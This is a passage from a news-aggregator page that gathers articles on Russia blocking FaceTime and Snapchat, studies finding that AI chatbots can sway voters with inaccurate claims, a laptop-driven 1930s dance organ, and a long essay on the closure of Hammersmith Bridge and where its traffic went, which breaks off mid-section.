It's either that, or just stop making products. There are some echoes to the global chip shortages that hit in 2021-2022, and that really shook up the market for smaller companies.

I hate to see it happening again, but somehow, here we are a few years later, except this time, the AI bubble is to blame.

Sorry for not having a positive note to end this on, but I guess... maybe it's a good time to dig into that pile of old projects you never finished instead of buying something new this year.

How long will this last? That's anybody's guess. But I've already put off some projects I was gonna do for 2026, and I'm sure I'm not the only one.

Russia blocks FaceTime and Snapchat over use in terrorist attacks

Bleeping Computer
www.bleepingcomputer.com
2025-12-04 19:12:18
Russian telecommunications watchdog Roskomnadzor has blocked access to Apple's FaceTime video conferencing platform and the Snapchat instant messaging service, claiming they're being used to coordinate terrorist attacks. [...]...
Original Article


Russian telecommunications watchdog Roskomnadzor has blocked access to Apple's FaceTime video conferencing platform and the Snapchat instant messaging service, claiming they're being used to coordinate terrorist attacks.

Roskomnadzor said that the two platforms are also being used to recruit criminals and to commit fraud and various other crimes targeting Russian citizens.

"According to law enforcement agencies, the FaceTime service is used to organize and carry out terrorist attacks in the country, recruit their perpetrators, commit fraudulent and other crimes against our citizens," it said in a Thursday statement.

While it didn't announce it until today, the Russian telecom regulator said that Snapchat had been blocked on October 10, "in accordance with the rules of centralized management of the public communication network."

As of this month, Snapchat for Android has been downloaded over 1 billion times on the Google Play Store, while the iOS version has over 5.2 million ratings on Apple's App Store. FaceTime is Apple's proprietary videotelephony platform that comes preinstalled on the company's iOS and macOS devices.

Apple and Snap spokespersons were not immediately available for comment when contacted by BleepingComputer earlier today.

On Wednesday, Roskomnadzor also banned the Roblox online gaming platform for allegedly failing to stop the distribution of what the Russian watchdog described as LGBT propaganda and extremist materials.

Russian news agency Interfax also reported on Friday that Russia is planning to ban Meta's WhatsApp messaging platform, which is now being used by over 3 billion people worldwide.

One year ago, Roskomnadzor blocked the Viber encrypted messaging app, used by hundreds of millions, for violating the country's anti-extremism and anti-terrorism legislation, months after blocking access to the Signal encrypted messaging service for the same reason.

In March 2023, it also banned government and state agencies from using foreign private messaging platforms, including Discord, Microsoft Teams, Telegram, Threema, Viber, WhatsApp, and WeChat, claiming that these services had failed to remove "misinformation" from their platforms.


Scientists Are Increasingly Worried AI Will Sway Elections

404 Media
www.404media.co
2025-12-04 19:00:28
AI models can meaningfully sway voters on candidates and issues, including by using misinformation, and they are also evading detection in public surveys according to three new studies....
Original Article


Scientists are raising alarms about the potential influence of artificial intelligence on elections, according to a spate of new studies that warn AI can rig polls and manipulate public opinion.

In a study published in Nature on Thursday, scientists report that AI chatbots can meaningfully sway people toward a particular candidate—providing better results than video or television ads. Moreover, chatbots optimized for political persuasion “may increasingly deploy misleading or false information,” according to a separate study published on Thursday in Science.

“The general public has lots of concern around AI and election interference, but among political scientists there’s a sense that it’s really hard to change people’s opinions,” said David Rand, a professor of information science, marketing, and psychology at Cornell University and an author of both studies. “We wanted to see how much of a risk it really is.”

In the Nature study, Rand and his colleagues enlisted 2,306 U.S. citizens to converse with an AI chatbot in late August and early September 2024. The AI model was tasked with both increasing support for an assigned candidate (Harris or Trump) and with increasing the odds that a participant who initially favored the model’s candidate would vote, or decreasing the odds they would vote if the participant initially favored the opposing candidate—in other words, voter suppression.

In the U.S. experiment, the pro-Harris AI model moved likely Trump voters 3.9 points toward Harris, a shift four times larger than the impact of traditional video ads used in the 2016 and 2020 elections. Meanwhile, the pro-Trump AI model nudged likely Harris voters 1.51 points toward Trump.

The researchers ran similar experiments involving 1,530 Canadians and 2,118 Poles during the lead-up to their national elections in 2025. In the Canadian experiment, AIs advocated either for Liberal Party leader Mark Carney or Conservative Party leader Pierre Poilievre. Meanwhile, the Polish AI bots advocated for either Rafał Trzaskowski, the centrist-liberal Civic Coalition’s candidate, or Karol Nawrocki, the right-wing Law and Justice party’s candidate.

The Canadian and Polish bots were even more persuasive than those in the U.S. experiment: the bots shifted candidate preferences up to 10 percentage points in many cases, roughly three times the movement seen among American participants. It’s hard to pinpoint exactly why the models were so much more persuasive to Canadians and Poles, but one significant factor could be the intense media coverage and extended campaign duration in the United States relative to the other nations.

“In the U.S., the candidates are very well-known,” Rand said. “They've both been around for a long time. The U.S. media environment also really saturates with people with information about the candidates in the campaign, whereas things are quite different in Canada, where the campaign doesn't even start until shortly before the election.”

“One of the key findings across both papers is that it seems like the primary way the models are changing people's minds is by making factual claims and arguments,” he added. “The more arguments and evidence that you've heard beforehand, the less responsive you're going to be to the new evidence.”

While the models were most persuasive when they provided fact-based arguments, they didn’t always present factual information. Across all three nations, the bot advocating for the right-leaning candidates made more inaccurate claims than those boosting the left-leaning candidates. Right-leaning laypeople and party elites tend to share more inaccurate information online than their peers on the left, so this asymmetry likely reflects the internet-sourced training data.

“Given that the models are trained essentially on the internet, if there are many more inaccurate, right-leaning claims than left-leaning claims on the internet, then it makes sense that from the training data, the models would sop up that same kind of bias,” Rand said.

With the Science study, Rand and his colleagues aimed to drill down into the exact mechanisms that make AI bots persuasive. To that end, the team tasked 19 large language models (LLMs) to sway nearly 77,000 U.K. participants on 707 political issues.

The results showed that the most effective persuasion tactic was to provide arguments packed with as many facts as possible, corroborating the findings of the Nature study. However, there was a serious tradeoff to this approach, as models tended to start hallucinating and making up facts the more they were pressed for information.

“It is not the case that misleading information is more persuasive,” Rand said. “I think that what's happening is that as you push the model to provide more and more facts, it starts with accurate facts, and then eventually it runs out of accurate facts. But you're still pushing it to make more factual claims, so then it starts grasping at straws and making up stuff that's not accurate.”

In addition to these two new studies, research published in Proceedings of the National Academy of Sciences last month found that AI bots can now corrupt public opinion data by responding to surveys at scale. Sean Westwood, associate professor of government at Dartmouth College and director of the Polarization Research Lab, created an AI agent that exhibited a 99.8 percent pass rate on 6,000 attempts to detect automated responses to survey data.

“Critically, the agent can be instructed to maliciously alter polling outcomes, demonstrating an overt vector for information warfare,” Westwood warned in the study. “These findings reveal a critical vulnerability in our data infrastructure, rendering most current detection methods obsolete and posing a potential existential threat to unsupervised online research.”

Taken together, these findings suggest that AI could influence future elections in a number of ways, from manipulating survey data to persuading voters to switch their candidate preference—possibly with misleading or false information.

To counter the impact of AI on elections, Rand suggested that campaign finance laws should provide more transparency about the use of AI, including canvasser bots, while also emphasizing the role of raising public awareness.

“One of the key take-homes is that when you are engaging with a model, you need to be cognizant of the motives of the person that prompted the model, that created the model, and how that bleeds into what the model is doing,” he said.


Chatbots can sway political opinions but are ‘substantially’ inaccurate, study finds

Guardian
www.theguardian.com
2025-12-04 19:00:28
‘Information-dense’ AI responses are most persuasive but these tend to be less accurate, says security report Chatbots can sway people’s political opinions but the most persuasive artificial intelligence models deliver “substantial” amounts of inaccurate information in the process, according to the ...
Original Article

Chatbots can sway people’s political opinions but the most persuasive artificial intelligence models deliver “substantial” amounts of inaccurate information in the process, according to the UK government’s AI security body.

Researchers said the study was the largest and most systematic investigation of AI persuasiveness to date, involving nearly 80,000 British participants holding conversations with 19 different AI models.

The AI Security Institute carried out the study amid fears that chatbots can be deployed for illegal activities including fraud and grooming.

The topics included “public sector pay and strikes” and “cost of living crisis and inflation”, with participants interacting with a model – the underlying technology behind AI tools such as chatbots – that had been prompted to persuade the users to take a certain stance on an issue.

Advanced models behind ChatGPT and Elon Musk’s Grok were among those used in the study, which was also authored by academics at the London School of Economics, Massachusetts Institute of Technology, the University of Oxford and Stanford University.

Before and after the chat, users reported whether they agreed with a series of statements expressing a particular political opinion.

The study, published in the journal Science on Thursday, found that “information-dense” AI responses were the most persuasive. Instructing the model to focus on using facts and evidence yielded the largest persuasion gains, the study said. However, the models that used the most facts and evidence tended to be less accurate than others.

“These results suggest that optimising persuasiveness may come at some cost to truthfulness, a dynamic that could have malign consequences for public discourse and the information ecosystem,” said the study.

On average, the AI and human participant would each send about seven messages in a conversation lasting 10 minutes.

It added that tweaking a model after its initial phase of development, in a practice known as post-training, was an important factor in making it more persuasive. The study made the models, which included freely available “open source” models such as Meta’s Llama 3 and Qwen by the Chinese company Alibaba, more convincing by combining them with “reward models” that recommended the most persuasive outputs.

Researchers added that an AI system’s ability to churn out information could make it more manipulative than the most compelling human.

“Insofar as information density is a key driver of persuasive success, this implies that AI could exceed the persuasiveness of even elite human persuaders, given their unique ability to generate large quantities of information almost instantaneously during conversation,” said the report.

Feeding models personal information about the users they were interacting with did not have as big an impact as post-training or increasing information density, said the study.

Kobi Hackenburg, an AISI research scientist and one of the report’s authors, said: “What we find is that prompting the models to just use more information was more effective than all of these psychologically more sophisticated persuasion techniques.”

However, the study added that there were some obvious barriers to AIs manipulating people’s opinions, such as the amount of time a user may have to engage in a long conversation with a chatbot about politics. There are also theories suggesting there are hard psychological limits to human persuadability, researchers said.

Hackenburg said it was important to consider whether a chatbot could have the same persuasive impact in the real world where there were “lots of competing demands for people’s attention and people aren’t maybe as incentivised to sit and engage in a 10-minute conversation with a chatbot or an AI system”.

Who Hooked Up a Laptop to a 1930s Dance Hall Machine?

Hacker News
www.chrisbako.com
2025-12-04 18:55:06
Comments...
Original Article

I had the pleasure of going to the Netherlands in 2023.

Amsterdam and Rotterdam are cool, but Utrecht has something really special: the Speelklok (self-playing instrument) Museum.

There’s so much cool stuff in there: automata, the only self-playing violin, clocks, draaiorgels (street organs). But the coolest is this.

This is playing from a laptop

That is a 1930s dance hall machine. It takes in a cardboard book with hole punches. The music is encoded as punches: each hole tells the machine to play that note from the music staff. It replaced music barrels, the metal barrels with nubs that strike forks as in music boxes, since punched books, unlike barrels, could be programmed with new songs.

But somehow someone hooked up a laptop to it! So now it can play mp3s from a laptop instead of the book. What?!

How, why and who are a total mystery to me, but I’d like to find out more.

I’ve sent the museum an email and hope to hear back for more info. It’ll take about 14 business days. If you know anything about this please reach out.

Maybe the internet can help me figure this out?

- Chris

Hammersmith Bridge – Where did 25,000 vehicles go?

Hacker News
nickmaini.substack.com
2025-12-04 18:52:22
Comments...
Original Article

Paris, 15th April 2019, 6:43pm.

Inside the ancient cathedral all is quiet. Afternoon light filters through the stained glass.

A fire alarm pierces the silence.

Within minutes, flames tear through the oak roof. Eight centuries of timber explode into an inferno visible across the city. Parisians gather on the Seine’s banks as the spire collapses through the nave in a cascade of embers.

Hours later, the French President stands before the ruin: “Cette cathédrale, nous la rebâtirons.”

This cathedral, we will rebuild it.

On 8th December 2024, five years and seven months after the fire, Notre-Dame reopens, its spire restored, the rose windows gleaming once again.

London, 10th April 2019, 3:47pm.

Five days earlier, it’s a bright spring afternoon in west London.

On Hammersmith Bridge, traffic inches forward, suffocated by congestion. Above, the suspension chains creak under the weight of queuing cars. Cyclists weave between wing mirrors. Beneath the footpaths, invisible cracks spread deeper into the 132-year-old pedestals.

Engineers monitoring the structure see the warning signs of imminent collapse. The decision is taken: close the bridge to motor traffic immediately.

Barriers go up. The traffic melts away.

Six years later, Hammersmith Bridge remains closed to vehicles. The solution proposed by local authorities costs £250m and has no funding.

Hammersmith Bridge, now completely closed (2022). Source

One might reasonably object that comparing Notre-Dame to Hammersmith Bridge is unfair. A Gothic cathedral and a Victorian suspension bridge are worlds apart.

Fair enough. Instead, consider this comparison: Hammersmith Bridge itself.

In 1882, a boat struck Hammersmith Bridge causing damage that revealed five decades of deterioration. Parliament authorised a replacement in 1883 and provided for a temporary crossing. Four years later, the Prince of Wales opened a new bridge designed by Bazalgette (of London sewer fame). Cost: £83,000 (£9.5m today). 1

In 2019, ultrasound revealed dangerous micro-fractures in Hammersmith Bridge’s structure. The bridge was immediately closed with no temporary alternative provided. Six years later, the bridge is still closed to traffic (but stabilised). Cost to date: £48m, with full restoration estimated at £250m. Long-term solution: none.

Our Victorian forebears rebuilt their broken bridge faster than we’ve failed to find a solution for ours.

Source: Author

Hammersmith Bridge isn’t just a local transport problem, it’s symptomatic of Britain’s broader state crisis.

This is happening in central London. Not in a rural “backwater”, not in a “left behind” urban centre, but in one of the wealthiest communities in Britain, on a major transport artery. If Britain cannot fix Hammersmith Bridge, what is failing in places that nobody is watching?

This essay examines two questions.

  • First: how did Britain reach a point where we cannot fix a bridge?

  • Second: given that reality, what should we actually do about Hammersmith Bridge?

The first answer reveals a state crisis: every actor can block decisions; none can compel action.

The second is more surprising.

When the bridge closed, about 25,000 vehicles crossed it daily and TfL predicted a severe economic impact.

Six years later, 9,000 of those journeys have vanished - not diverted to other crossings, but simply evaporated. Yet the local economy has adapted, air quality has improved, and overall traffic congestion has lessened.

This counterintuitive outcome begs the question: are we actually solving the right problem?

The “obvious” £250m solution may be addressing the wrong issue. The best solution may cost far less, involve no cars, and turn paralysis into opportunity.

Hammersmith Bridge on Boat-Race Day (1862) Walter Greaves. Source: Tate

Hammersmith Bridge is a testament to Victorian engineering prowess. The present-day bridge is Bazalgette’s 1887 design: a wrought-iron suspension structure with ornate decorative features and coated in deep green paint that blends into the willow-lined bank.

It replaced an earlier bridge constructed in 1827 by local engineer William Tierney Clark. That first bridge cost £80,000 (approximately £8.9m today), was funded by private investors, and was operated as a private toll bridge by the Hammersmith Bridge Company. 2 Unusually amongst London toll bridges, it turned a profit. In 1880, it was purchased by the Metropolitan Board of Works and made toll-free. 3

Clark’s designs at Hammersmith and Marlow so impressed a visiting Hungarian aristocrat that he was later commissioned to build a sister bridge in Budapest, the Széchenyi Chain Bridge over the Danube, which remains a national symbol today. 4

Fifty years later, in 1882, the aforementioned boat collision and concerns about weight capacity on Boat Race days led Parliament to authorise a replacement. 5 A temporary crossing structure was installed and just four years later, on 11th June 1887, Bazalgette’s bridge was opened at the cost of £83,000 (approximately £9.5m today). 6

Hammersmith Bridge (Bazalgette 1887 Design). Source: The Engineer , April 1887

For over 125 years, the bridge received minimal maintenance. 7 This is despite it being bombed three times: by the IRA in 1939, the Provisional IRA in 1996, and the Real IRA in 2000. 8 9

Only in 2014 was a comprehensive structural review first commissioned. 10

The findings were alarming: decades of unchecked corrosion had created micro-fractures throughout the suspension structure, and the Victorian bearings that allow the bridge to flex with temperature had seized solid.

In April 2019, engineers discovered that the micro-fractures had widened enough to close the bridge to vehicles, though pedestrians and cyclists could still cross. Then in August 2020’s heatwave, sensors detected rapid crack expansion. The council’s senior engineer allegedly gave the council leader just 30 seconds to make the critical decision. 11

Cast iron is unforgivingly brittle; it doesn’t bend, it shatters. With the potential for catastrophic collapse into the Thames, the bridge was completely closed, halting both pedestrian and river traffic beneath. 12

Did the review and precautionary measures save lives?

Consider Genoa’s Morandi Bridge: a 210-metre section collapsed in August 2018, killing 43 people. The operator had warned in 2011 that collapse within 10 years was possible, yet adequate action was never taken.

Compare too Dresden’s Carola Bridge: a 100-metre section collapsed in September 2024, just minutes after the last tram crossed. The cause was hidden stress corrosion cracking that had existed since construction in 1971.

In 2021, stabilisation work was undertaken and the bridge’s side walkways were made accessible to pedestrians and cyclists. 13 Engineers innovatively filled the cast iron pedestals with fibre-reinforced concrete, installed steel support frames, replaced the Victorian bearings with modern rubber ones, and wrapped the chains in foil with air conditioning to keep them cool during heatwaves.

Mott Macdonald Stabilisation Works

What can the stabilised bridge carry?

The local council initially claimed the post-stabilisation weight restriction limited vehicles to 1 tonne (equivalent to a Fiat 500). After a third FOI request and internal review, the local council acknowledged the maximum allowable mass was 3 tonnes (a Volkswagen Transporter). 14 The bridge cannot support regular buses (12-18 tonnes) or normal traffic, but could theoretically support one lightweight vehicle. The stabilisation has secured the structure, but not restored its function.

In April 2025, with stabilisation achieved, the main carriageway was reopened to cyclists and pedestrians, exactly six years after the initial closure, but remains closed to all vehicle traffic including buses and cars.

Left: Fiat 500 (~1 tonne). Right: Volkswagen Transporter (~3 tonnes)

The stabilisation works to date have cost £48m, five times the inflation-adjusted construction cost of the entire original bridge - why is that?

The explanation lies in a fundamental shift in cost structure.

  • The 1887 bridge (£83,000, or £9.5m today) was dominated by material costs (perhaps 60%), with minimal professional fees and zero regulatory costs. 15

  • The 2019-25 stabilisation (£48m cost) inverts this cost structure: labour comprises perhaps 40%, professional fees have tripled to perhaps 18%, and regulatory compliance (a category that didn’t exist in Victorian times) consumes perhaps 12%. 16

No itemised accounts exist for either project, but these estimates are based on comparative studies of similar projects (methodology in footnotes).
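To make those shares concrete, here is a minimal Python sketch of the absolute amounts they imply (the percentages are the rough comparative estimates above, not itemised accounts):

# Rough absolute figures implied by the estimated cost shares above.
# The shares are comparative estimates, not itemised accounts.
cost_1887 = 9.5e6   # 1887 build, inflation-adjusted (£)
cost_2025 = 48e6    # 2019-25 stabilisation (£)

print(f"1887 materials (~60%):             £{0.60 * cost_1887 / 1e6:.1f}m")
print(f"2025 labour (~40%):                £{0.40 * cost_2025 / 1e6:.1f}m")
print(f"2025 professional fees (~18%):     £{0.18 * cost_2025 / 1e6:.1f}m")
print(f"2025 regulatory compliance (~12%): £{0.12 * cost_2025 / 1e6:.1f}m")

On those numbers, regulatory compliance alone (~£5.8m) costs well over half of what it took to build the entire bridge in 1887, adjusted for inflation.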

There has been a profound increase in the cost of British infrastructure. This cost inflation reflects genuine progress, but of a specific kind.

The Victorians built with brutal efficiency: workers died on their projects (accepted as the cost of doing business), heritage protection was non-existent, and accountability was staked on just one engineer’s reputation.

We have replaced this with a system that is better, but also exponentially more expensive: zero-tolerance safety protocols, Grade II listing requirements, extensive insurance and oversight structures. Regulatory compliance alone now consumes perhaps 12% of the budget.

The Victorians deployed one engineer and one contractor. The modern stabilisation required six major organisations plus multiple specialist consultancies, quangos and charities. Each improvement is defensible on its own merits. Taken together, however, they create paralysis: costs multiply, timelines extend, and every stakeholder gains effective veto power.

These aren’t individual failures but rather a systemic accumulation of red tape that paralyses progress.

The £250m restoration

The first challenging technical problem is solved: the bridge is now stabilised, albeit at significant expense.

But who will fund the complete restoration to return the bridge to its full operational capacity?

In April 2023, the local council submitted a business case to the DfT for full restoration.

That proposed solution is a double-decker system designed by Foster & Partners: vehicles on top, pedestrians in an enclosed tunnel underneath, walking through a dim passage while traffic roars above their heads.

The cost: £250m (and rising with inflation). The timeline: 10 years from approval, meaning 16+ years total since closure.

There is an irony. The entire justification for this solution is heritage preservation, yet the design would encase the listed Victorian structure in an eyesore and force pedestrians into a claustrophobic tunnel, ruining the very heritage it claims to preserve.

Here’s where Britain’s infrastructure dysfunction becomes concrete.

Three players are each committed to funding one-third of any restoration: 17

  • London Borough of Hammersmith and Fulham (LBHF): Local council and bridge owner. £80m total reserves.

  • Transport for London (TfL) : Transport authority strategically responsible for river crossings but financially crippled despite government bailouts post-Covid. Faces a backlog of 100+ critical infrastructure repairs, with Hammersmith Bridge far down the priority list.

  • Department for Transport (DfT) : National government department, normally provides 85% funding for strategic bridge repairs but has slashed commitment to just 33% for Hammersmith.

Since LBHF submitted their restoration plan in April 2023, the DfT has sat on this business case.

Why have they delayed? It is very likely that the £250m restoration will fail the Treasury’s value-for-money tests, but nobody is yet willing to admit that publicly.

The benefits are modest: reconnecting two wealthy areas across a short river crossing with multiple alternatives nearby. The costs are astronomical: £250m for bespoke heritage restoration, taking 10+ years, with each party exposed to inflation risk.

For context, TfL spent only £42m between 2010 and 2021 on the maintenance of all Thames river crossings.

Some would call Hammersmith Bridge a state capacity failure . But let’s be precise about what has actually failed.

Not engineering ability: British engineers remain world-class, and the stabilisation work completed so far is evidence of that. Not resources: the proposed cost is a rounding error in national budget terms.

What has failed is our political capacity: the ability to make decisions, assign responsibility, and accept trade-offs.

We’ve created a planning system in which every actor can block and add cost but where none can decide, where doing nothing is the safest choice.

In the vacuum left by years of inaction, a cottage industry of alternative proposals has emerged.

Baynes & Mitchell proposed a £110m interwoven structure. Sybarite’s inventive mirror-polished steel “ribbon” was dismissed as “another eccentric press stunt” by the council. Anthony Carlile Architects mocked up a temporary barge bridge . The Manser Practice held an internal competition yielding conceptual designs. The Richmond MP proposed licensed rickshaws . 18 LBHF council have “not ruled out” funding restoration via a resident-exempt vehicle toll (though this appears unviable on basic calculations), 19 whilst the DfT briefly considered permanent closure as a monument.
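On the tolling point, a quick back-of-the-envelope sketch shows why a resident-exempt toll looks unviable; every input below is an illustrative assumption rather than a council figure:

# Illustrative check on a resident-exempt toll funding the £250m restoration.
# All inputs are assumptions for the sketch, not official figures.
restoration_cost = 250e6
daily_vehicles = 25_000      # pre-closure traffic (2019)
tollable_share = 0.5         # assume half of trips are by non-exempt non-residents
demand_suppression = 0.5     # assume tolls and modal shift halve tollable trips
toll = 3.0                   # £ per crossing, roughly congestion-charge scale
collection_overhead = 0.3    # assume 30% of revenue goes on running the scheme

daily_revenue = daily_vehicles * tollable_share * demand_suppression * toll
annual_net = daily_revenue * 365 * (1 - collection_overhead)
print(f"Net toll revenue: £{annual_net / 1e6:.1f}m per year")
print(f"Simple payback:   {restoration_cost / annual_net:.0f} years (before financing costs)")

Even on these generous assumptions the toll nets roughly £4.8m a year, implying a payback of around 50 years before any financing costs.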

Even friends regularly offer enlightening new suggestions: inhabited bridges (funded through commercial and residential leases); a version of Wuppertal’s Schwebebahn (a suspended public transport monorail operating since 1901); or London’s failed Garden Bridge. 20

The problem is not ingenuity. It is a system that blocks any decision-making.

Here is a more facetious proposal: award the contract to a Chinese state-owned operator.

Why China? Well, China’s bridge engineering operates at a scale that is difficult for those of us in a de-industrialised nation to comprehend.

At least nine Chinese bridges have been built that are long enough to span the English Channel. 21

For instance, the 55km 6-lane trans-oceanic Hong Kong-Zhuhai-Macau Bridge features 23km of elevated sections, a 6.7km immersed vehicle tunnel at 45 metres below sea level, and four artificial islands , completed in just 9 years of construction . 22

The Huajiang Grand Canyon Bridge , completed in September 2025, is furnished with a “ cafe in the clouds ” and an artificial waterfall . It spans 2,890m at a height of 625m above the Beipan River and was built in less than 4 years for ~£220m ( 2.1 billion yuan ), less than the proposed restoration of Hammersmith Bridge. 23

In comparison to these mega-projects, Hammersmith Bridge seems rather modest.

But Britain is not China.

In terms of state capacity , China’s sustained construction programme generates continuous learning and accumulated expertise; Britain builds episodically, and as much as half of its construction wage premium reflects costs rising without corresponding productivity gains. 24

But in terms of values : we demand zero construction deaths, fair wages, and democratic accountability. China’s infrastructure achievements are staggering, but they’re inseparable from its authoritarian system: bridges built without parliamentary debate, villages demolished, environmental concerns overridden, labour protections minimal. The headline costs mask 8-15 worker deaths per project, daily wages of £1-8, and lower build quality. 25

Britain’s paralysis isn’t simply incompetence, it’s the cost of worker safety, political accountability and heritage protection.

The question is not “why can’t we build like China?” but “how do we deliver infrastructure within our political and value system?”

£250m for a restoration is an extraordinary sum of money, so how about we just build a new bridge altogether?

At the January 2025 Taskforce meeting , the DfT proposed a demolition and rebuild . This proposal was rejected as legally impossible given the structure’s Grade II listing. But the heritage protection framework is policy, not immutable law. The Grade II listing was only awarded in 2008.

What would it cost simply to demolish Hammersmith Bridge and build a modern replacement?

The brief (assuming permission were granted) would be to demolish the existing structure and build a functional, safe 210-metre Thames crossing at Hammersmith, carrying two vehicle lanes plus pedestrians and cyclists.

Answer : £150-225m . A complete replacement would most likely be a beam bridge and require 4-6 years from project start to completion. Overall contingency 20%. The full methodology for my estimate can be found in the footnotes. 26
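As a small worked detail, the quoted range already includes the 20% contingency, so the implied base construction estimate is the range divided by 1.2:

# The headline £150-225m range includes a 20% contingency;
# dividing by 1.2 recovers the implied base estimate.
low, high, contingency = 150e6, 225e6, 0.20
print(f"Implied base cost: £{low / (1 + contingency) / 1e6:.0f}m - £{high / (1 + contingency) / 1e6:.0f}m")
# prints: Implied base cost: £125m - £188m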

For a sample of comparable international bridges as well as comparable Thames river crossings, please follow this link .

There are two caveats to this estimate:

First, I’m not an engineer or architect. This estimate can in no way replace a detailed feasibility study; it is a back-of-the-envelope guess that offers a rough benchmark.

Second, this estimate underplays the vast range of uncertainty in UK infrastructure delivery . Although there is limited ambiguity in the engineering of the bridge itself, the current state of infrastructure construction in Britain means that the final price tag is highly uncertain.

Just compare other recent projects for Thames river crossings. The Rotherhithe Bridge saw costs triple from £100m to £463m before cancellation. The Lower Thames Crossing has spent over £300m on planning alone - more than Norway spent building the world’s longest road tunnel (the Laerdal Tunnel ). The Thames Tideway Tunnel escalated from a £1.7bn estimate in 2004 to £4.5bn by completion in 2025. The Silvertown Tunnel cost £2.2bn for a straightforward 1.4km crossing. 27 Or consider High Speed 2 (HS2): £40.5bn spent to date (as of April 2025), having achieved very few of its stated aims. Final cost estimated at over £100bn in today’s money. 28 That includes the £100m bat tunnel and the £100m HS2 bridge to nowhere . 29

Even if the costs of a rebuild were acceptable to the Treasury (they’re not) and the legal barriers were removed (they won’t be), demolition would destroy real value. £48m has already been spent stabilising the bridge, and this is not simply sunk cost fallacy. The bridge now functions for cyclists and pedestrians, can structurally carry vehicles up to 3 tonnes, and retains heritage significance no rebuild could match.

When projects routinely spend hundreds of millions just obtaining permission, throwing away a stabilised structure becomes hard to justify.

The bridge has been closed to motor traffic for six years. Primary school children in Barnes cannot remember when cars could cross. What began as an emergency closure has calcified into permanent car-free status through institutional paralysis.

The solution that is unfolding by default is to do nothing.

This has never been formally proposed, yet everyone’s inaction points towards it. Last month, bridge contractors filed a planning application requesting permission to transport Victorian ironwork to Brighton for long-term storage, indicating no prospect of restoration in the foreseeable future. 30 After all, it could take years or decades before political change unblocks this system to even enable a rebuild, if ever.

To do nothing would imply that vehicle access does not matter. The bridge isn’t really closed - you can still walk or cycle across. And that’s better, isn’t it? We don’t want cars in cities anyway, right? 31

No! A major London transport link has ceased to function, and there are currently no plans to address it. That should not be acceptable in a competently governed society.

We cannot accept this state of affairs.

But first, we must ask the right questions.

When I began researching this piece, my intuition was straightforward: closing a major bridge carrying 25,000 daily vehicles should lead to more traffic on other nearby crossings and less economic activity on either side.

The evidence shows the exact opposite. Today there is less traffic and more economic activity .

How is that possible?

To answer that question, we must understand:

  • What happened to the traffic?

  • What are the social and economic impacts of the closure?

  • Who has been genuinely disadvantaged?

Hammersmith Bridge (May 2018). Source: Alamy
Hammersmith Bridge (2025). Source: Author

When the bridge closed in 2019, 25,000 vehicles crossed it each day.

TfL predicted chaos: a July 2019 impact assessment showed 15,000 additional motorised vehicles per day on alternative crossings and estimated “social dis-benefits to exceed £50m per annum.” Local MPs still cite these figures.

But what does the data show six years on?

Today, there is less traffic and congestion on nearby Thames crossings than before the closure.

The data shows traffic has reduced in almost all the locations where increases were initially recorded. By 2024, overall motor traffic volumes across the affected region had fallen by around 10% more than in the rest of London (a 25% fall overall). Likewise, total traffic counts on neighbouring road bridges are lower than pre-closure (charts above).

Putney Bridge shows a different, idiosyncratic effect. Traffic initially fell back after the closure in 2019, but delays began to increase in 2023. That sequence suggests that variables unrelated to the closure are affecting travel times there.

Putney Bridge. Source: DfT & TfL (via Tom Pike)

Where did the traffic go?

Cycling data provides part of the answer. Richmond Council’s survey revealed that even a few months after closure, 44% of former drivers had already switched to walking or cycling.

Cycle counts across the area have also markedly increased. This is known in the literature as a “ modal shift ”. Richmond-upon-Thames now has one of the highest active travel mode shares in Britain.

So, of the original 25,000 daily trips, most shifted to cycling, walking and public transport, and some moved to other bridges.

But here’s the puzzle: TfL reports that 9,000 vehicles (36%) have simply vanished from the road network entirely - they are no longer visible on any crossing between central London and southwest London.

What happened to those 9,000 journeys that simply evaporated?

Was economic activity lost? Were human connections severed? Did relatives stop visiting grandparents? Did businesses stop making deliveries?

The answer may lie in a counterintuitive phenomenon known as Braess’ Paradox : adding capacity to a congested network can worsen performance, while removing it can improve things. 32

When drivers make individually rational routing decisions, they reach an equilibrium where no single driver benefits from changing route, but this equilibrium is often inefficient for the system as a whole.
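A minimal numerical sketch makes this concrete. It uses the textbook four-node Braess network with its standard illustrative numbers, not Hammersmith data:

# Textbook Braess network: 4,000 drivers travel from A to B.
# Two links are congestible (time grows with flow), two are fixed.
drivers = 4000
congestible = lambda flow: flow / 100   # minutes, grows with traffic
fixed_time = 45                         # minutes, independent of traffic

# Without a shortcut, drivers split evenly between two symmetric routes.
per_route = drivers / 2
time_without = congestible(per_route) + fixed_time           # 20 + 45 = 65

# Add a free shortcut joining the two congestible links: the individually
# rational choice is to use both of them, so every driver piles on.
time_with = congestible(drivers) + 0 + congestible(drivers)  # 40 + 40 = 80

print(f"Equilibrium time without the extra link: {time_without:.0f} min")
print(f"Equilibrium time with the extra link:    {time_with:.0f} min")

Adding the link makes every journey 15 minutes slower at equilibrium; removing it makes everyone faster, even though no individual driver would choose to give it up.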

In Hammersmith’s case, the closure forced a new equilibrium. The 9,000 vanished vehicles weren’t displaced elsewhere, nor did they represent lost economic activity. They were replaced by alternatives that were more efficient in the new system.

The shopper who made three separate car trips weekly now combines errands or orders online from consolidated delivery services. The school run that meant queueing in traffic now happens on foot or by bike. The commuter who spent 20 minutes driving and searching for parking now cycles in 12 minutes.

After tube strikes, 5% of commuters permanently switch because disruption forces them to discover faster alternatives.

Hammersmith Bridge’s closure worked similarly: people tried new transport modes and often found they were better. 33

When the bridge closed, TfL predicted economic contraction. The opposite occurred.

Mastercard data shows spending in Barnes grew at more than twice the London average. 34 Spending increased +21% in Barnes (SW13) and +13% in Hammersmith (W6), compared to London’s +9% average. This held even when the bridge was closed to pedestrians and cyclists.

However, this aggregate spending increase does mask a more nuanced set of changes in local business composition. Data from the same Barnes Community Association survey in 2020 suggested that specialist retailers that previously relied on cross-river customers experienced revenue declines, whilst local businesses serving residential communities tended to adapt most successfully. 35

As early as 2020, the closure appears to have reshaped Barnes’ commercial character towards neighbourhood-focused businesses rather than destination retail, potentially strengthening its role as a local high street. Now, six years later, the local economy has entirely adapted to the new reality.

Air quality improved at every monitoring station across the region, with nitrogen dioxide levels dropping significantly in Hammersmith, most of Barnes, and even Putney; the reduced pollution likely increased dwell time and spending.

Emergency services have reported no impact on response times . The London Ambulance Service stated they have “never released any information about the closure impacting response times,” whilst London Fire Brigade data shows no increase in 999 response times in the Barnes peninsula.

West London’s economy hasn’t contracted; it has adapted. This isn’t suppression of activity; it’s optimisation. Economic vitality requires efficient connectivity, not maximum motorised vehicle throughput.

However, there are important confounding factors .

